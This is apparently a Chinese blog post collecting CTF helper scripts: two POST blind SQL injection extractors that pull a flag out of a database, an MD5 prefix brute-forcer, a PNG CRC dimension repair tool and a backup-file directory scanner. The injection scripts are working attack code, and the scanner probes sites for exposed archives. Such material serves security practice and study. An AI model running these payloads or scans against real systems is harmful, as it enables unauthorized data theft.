POST盲注(暴力)
from requests import *
import time
url = ''
payload = {"id" : ""}
flag = ""


def _probe(position, code):
    """Send one true/false probe for byte `code` at `position` and report the outcome.

    The page's reply is classified by the presence of the marker string
    ("Hello" here; it stands in for whatever the target page echoes on the
    true branch).  One request is made per call, followed by a short pause.
    """
    payload["id"] = f"if((ascii(substr((select(flag)from(flag)),{position},1))={code}),1,0)"
    reply = post(url, payload)
    time.sleep(0.04)
    return "Hello" in reply.text


# Exhaustive variant: every printable byte is tried per position, so a full
# recovery costs up to ~100 near-identical POSTs per character -- a dense,
# regular burst that stands out in access logs.  The outer bound is only a
# ceiling; nothing stops the loop once the last character has been found.
for position in range(1, 10000000000):  # ceiling on the flag length
    time.sleep(0.06)
    for code in range(20, 126):  # printable ASCII candidates
        if _probe(position, code):
            print(position)
            flag += chr(code)
            print(flag)
            break
POST盲注(二分)
from requests import *
import time
url = ""
payload = {"id" : ""}
flag = ""


def _char_at(position):
    """Recover the byte at `position` by bisecting the range [20, 126).

    Each round asks whether the byte is greater than `mid`; a reply containing
    "Hello" (the true-branch marker of the target page) moves the lower bound
    up, anything else moves the upper bound down.  Bytes outside 20..125 are
    not representable and collapse to a boundary value.
    """
    lo, hi = 20, 126
    mid = (lo + hi) // 2
    while lo < hi:
        payload["id"] = f"(ascii(substr((select(flag)from(flag)),{position},1))>{mid})"
        reply = post(url, payload)
        time.sleep(0.04)
        if "Hello" in reply.text:
            lo = mid + 1
        else:
            hi = mid
        mid = (lo + hi) // 2
    return chr(mid)


# About seven requests per character instead of ~100 for the exhaustive
# variant; the loop bound is irrelevant because recovery stops at the first
# space character (chr(32)), which is what an exhausted substr() yields here.
for position in range(1, 200):
    time.sleep(0.06)
    ch = _char_at(position)
    if ch == " ":
        break
    flag += ch
    print(flag)
print("flag: " ,flag)
MD5碰撞
import requests
import base64
import sys
import hashlib
def getMd5(index):
    """Return the first integer in [100000, 100000000) whose decimal MD5 starts with `index`.

    `index` is compared for equality against the first six lowercase hex
    digits of md5(str(n)); a prefix of any other length therefore never
    matches.  Returns None if the whole range is exhausted (a full scan is
    slow: up to ~10^8 digests).
    """
    candidates = range(100000, 100000000)
    return next(
        (n for n in candidates
         if hashlib.md5(str(n).encode("utf8")).hexdigest()[:6] == index),
        None,
    )
target = input()  # the six-hex-digit MD5 prefix to search for
print(getMd5(target))
CRC修复
import zlib
import struct
import argparse
import itertools
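parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下图片的名称")
args = parser.parse_args()

# PNG layout: 8-byte signature, then the IHDR chunk = length (4) + type "IHDR"
# (4) + 13 data bytes (width, height, bit depth, colour type, ...) + CRC (4).
# The CRC covers type+data, i.e. bytes [12:29]; the recorded value sits at
# [29:33].  Width and height are the big-endian 32-bit fields at [16:20] and
# [20:24].
with open(args.f, 'rb') as fh:  # closed even if the checks below bail out
    bin_data = fh.read()

# Refuse anything that is not a PNG whose first chunk is IHDR: the slices
# below would otherwise hash arbitrary bytes and report a bogus result.
if len(bin_data) < 33 or bin_data[:8] != b"\x89PNG\r\n\x1a\n" or bin_data[12:16] != b"IHDR":
    raise SystemExit("文件不是PNG或首个块不是IHDR: " + args.f)

crc32key = zlib.crc32(bin_data[12:29])  # CRC of the IHDR chunk as stored
original_crc32 = struct.unpack('>I', bin_data[29:33])[0]  # CRC recorded in the file

if crc32key == original_crc32:  # stored CRC matches -> dimensions untouched
    print('宽高没有问题!')
else:
    input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        raise SystemExit()

    # Search 0..4095 for both dimensions (the full 32-bit range is impractical;
    # 0x0FFF comfortably covers real screen sizes).  Only width and height vary,
    # so the CRC of the fixed "IHDR" prefix and of each width is computed once
    # and resumed through zlib.crc32's start-value argument instead of
    # rehashing all 17 bytes for every candidate pair.
    prefix_crc = zlib.crc32(bin_data[12:16])
    tail = bin_data[24:29]
    height_blobs = [struct.pack('>I', j) + tail for j in range(4096)]
    for i in range(4096):
        width_crc = zlib.crc32(struct.pack('>I', i), prefix_crc)
        for j, blob in enumerate(height_blobs):
            crc32 = zlib.crc32(blob, width_crc)
            if crc32 == original_crc32:  # first (width, height) reproducing the stored CRC
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"宽度: {i}, hex: {hex(i)}")
                print(f"高度: {j}, hex: {hex(j)}")
                raise SystemExit(0)
    # Original silently fell through here; say so, since "no output" is
    # indistinguishable from a crash to the person running it.
    print("在0..4095范围内没有找到匹配的宽高")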
Web敏感目录扫描
import requests
import time
print("网址:")
url = input()
li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'index.php']
li2 = ['tar', 'tar.gz', 'zip', 'rar', 'swp']

# Each (name, extension) pair is requested once, one second apart, and the
# response object's repr (its status code) is printed.  From the server side
# this is a short, evenly spaced series of GETs for archive-like filenames
# under the site root -- a recognisable pattern in access logs.
for name in li1:
    for ext in li2:
        candidate = f"{name}.{ext}"
        r = requests.get(url + "/" + candidate)
        print(candidate)
        print(r)
        time.sleep(1)
From: https://www.cnblogs.com/master-lio/p/18018514